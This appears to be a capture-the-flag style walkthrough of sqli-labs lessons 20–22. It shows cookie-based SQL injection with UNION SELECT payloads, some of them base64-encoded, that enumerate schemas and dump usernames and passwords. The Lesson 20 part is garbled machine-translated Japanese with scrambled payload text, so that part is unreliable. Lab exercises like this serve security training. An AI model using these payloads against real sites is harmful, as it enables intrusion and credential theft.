LESS20
1. 20オフを入力した後、私たちは、ログのuname =管理者、そして、我々はまた、げっぷを動作させるために使用することができ、注射を動作させるためにストーブのブラウザにプラグインクッキーエディタを使用することができCOOKIEを、生成しました。
2.次に、我々はのuname管理者に置き換えられますプラグインクッキーエディタの操作の使用を通じて行わ」、ページを更新して保存し、結果は構文エラーを示唆して、我々はインジェクションの脆弱性を決定する必要があります。
3.注入文の構成を
入力組合1,2,3#を選択
私たちは、実際に裁判官によって、列の順序によるステップの数がある前に、私は、あなたが入力することができます省略された、エコーの位置を決定するために、各列の成功を見る3#順」と判断されます
4.ライブラリのチェック
入力:組合は1,2、GROUP_CONCAT(選択 information_schema.schemata#からSCHEMA_NAMEを)
5.查表
输入:セキュリティ'#」連合INFORMATION_SCHEMA.TABLES TABLE_SCHEMA =から1,2、GROUP_CONCAT(TABLE_NAME)を選択します'
6.列查
输入:ユーザー'#」を組合がtable_nameは= information_schema.columnsから1,2、GROUP_CONCAT(COLUMN_NAME)を選択'
7.查字段
输入:' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users#
LESS21
1.使用我们已知的用户名密码登录(admin),我们发现uname=YWRtaW4,其实这就是对Cookie进行了BASE64编码转换。
2.来到在线解密工具(URL:https://tool.oschina.net/encrypt?type=3),对YWRtaW4=解密。
3.构造注入语句。
经过测试我们可以发现需要用 ’)进行包裹。
输入:') union select 1,2,3#
经过转码后:JykgdW5pb24gc2VsZWN0IDEsMiwzIw==
好了,我们已经知道注入格式了,接下来的步骤与20关相同,可以参考,记得转码保存后刷新页面。
LESS22
这一关只是在注入构造语句上与less21不一样。
less-21是:') union select 1,2,3#
less-22是:" union select 1,2,3#
至此,sqli-labs基础部分全部完成。